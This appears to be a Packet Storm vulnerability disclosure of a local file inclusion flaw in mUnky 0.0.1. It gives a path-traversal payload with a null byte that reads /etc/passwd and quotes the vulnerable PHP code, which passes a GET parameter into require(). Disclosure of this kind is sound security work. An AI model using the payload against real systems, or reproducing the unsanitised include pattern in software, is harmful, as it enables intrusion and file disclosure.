mUnky version 0.0.1 suffers from a local file inclusion vulnerability in index.php.
b5ada2d4cb813068812b76c1dbd71fbd35a598f6188b5a15df7e1b9a4f02528e[*]================================================================================[*]
| _____ _ _ _ _____ |
| |_ _| |__ (_)_ __ __| | | ____| _ ___ |
| | | | '_ \| | '__/ _` | | _|| | | |/ _ \ |
| | | | | | | | | | (_| | | |__| |_| | __/ |
| |_| |_| |_|_|_| \__,_| |_____\__, |\___| |
| |___/ |
| ____ _ _ |
| / ___| ___ ___ _ _ _ __(_) |_ _ _ |
| \___ \ / _ \/ __| | | | '__| | __| | | | |
| ___) | __/ (__| |_| | | | | |_| |_| | |
| |____/ \___|\___|\__,_|_| |_|\__|\__, | |
| |___/ |
[*]================================================================================[*]
| Author: StAkeR ~ StAkeR@hotmail.it |
[*]================================================================================[*]
| mUnky 0.0.1 <= Local File Inclusion Vulnerability |
[*]================================================================================[*]
| Get => http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz |
[*]================================================================================[*]
| index.php?zone=../../../../../../../../../etc/passwd%00 |
[*]================================================================================[*]
| |
| //Check if zone is set |
| if(!isset($_GET['zone'])) |
| { |
| $zone = "home"; |
| } |
| else{ |
| $zone = $_GET['zone']; |
|} |
| //Check for the desired page |
| if(file_exists("zone/$zone.php")) |
| { |
| require("zone/$zone.php"); |
| } |
[*]================================================================================[*]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed